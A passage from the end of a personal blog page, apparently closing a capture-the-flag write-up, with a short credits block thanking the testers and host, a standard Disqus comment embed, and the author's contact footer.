 TOOL A SPECIAL THANKS GOES TO BENR AND GKNSB FOR TESTING
 AND TO GTMLK FOR THE OFFER TO HOST THE CTF AGAIN
 </code></pre>
 </div>
 <p>There you go!</p>
            </div>
            <div id="markdown-outline" class="col-lg-3">
            </div>
            <div id="disqus_thread"></div>
 <script type="text/javascript">
    /* * * CONFIGURATION VARIABLES * * */
    var disqus_shortname = 'paulwalko';
    /* * * DON'T EDIT BELOW THIS LINE * * */
    (function() {
        var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
 </script>
 <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
        </div>
    </div>
 <footer id="l-footer">
    <div class="container">
        <div class="row">
            <div id="contact" class="col-lg-6 col-lg-offset-1 col-md-6 col-md-offset-1 col-sm-9">
                <h3>CONTACT</h3>
                <div class="row">
                    <address id="address" class="col-lg-6 col-md-6 col-sm-6">
                        United States<br>
                        Paul Walko<br>
                    </address>
                    <ul class="col-lg-6 col-md-6 col-sm-6">
                        <li class="email"><i class="fa fa-envelope"></i> <a href="mailto:paulsw.pw@gmail.com"> &nbsp;&nbsp;paulsw.pw@gmail.com</a></li>
                        <li class="github"><i class="fa fa-github"></i> <a href="https://www.github.com/paulwalko"> &nbsp;&nbsp;https://www.github.com/paulwalko</a></li>
                    </ul>
                </div>
            </div>
        </div>
        <p id="legal">
            Copyright (c) 2015 Paul Walko | Powered by <a href="http://jekyllrb.com">Jekyll</a> &amp; <a href="http://github.com">GitHub</a> | designed &amp; built by <a href="http://unifreak.github.io">UniFreak</a>
        </p>
    </div>
 </footer>
 <script type="text/javascript" src="https://paul.walko.org/javascripts/base.js"></script>
    <script type="text/javascript" src="https://paul.walko.org/javascripts/markdownreader.js"></script>
 </body>
 </html>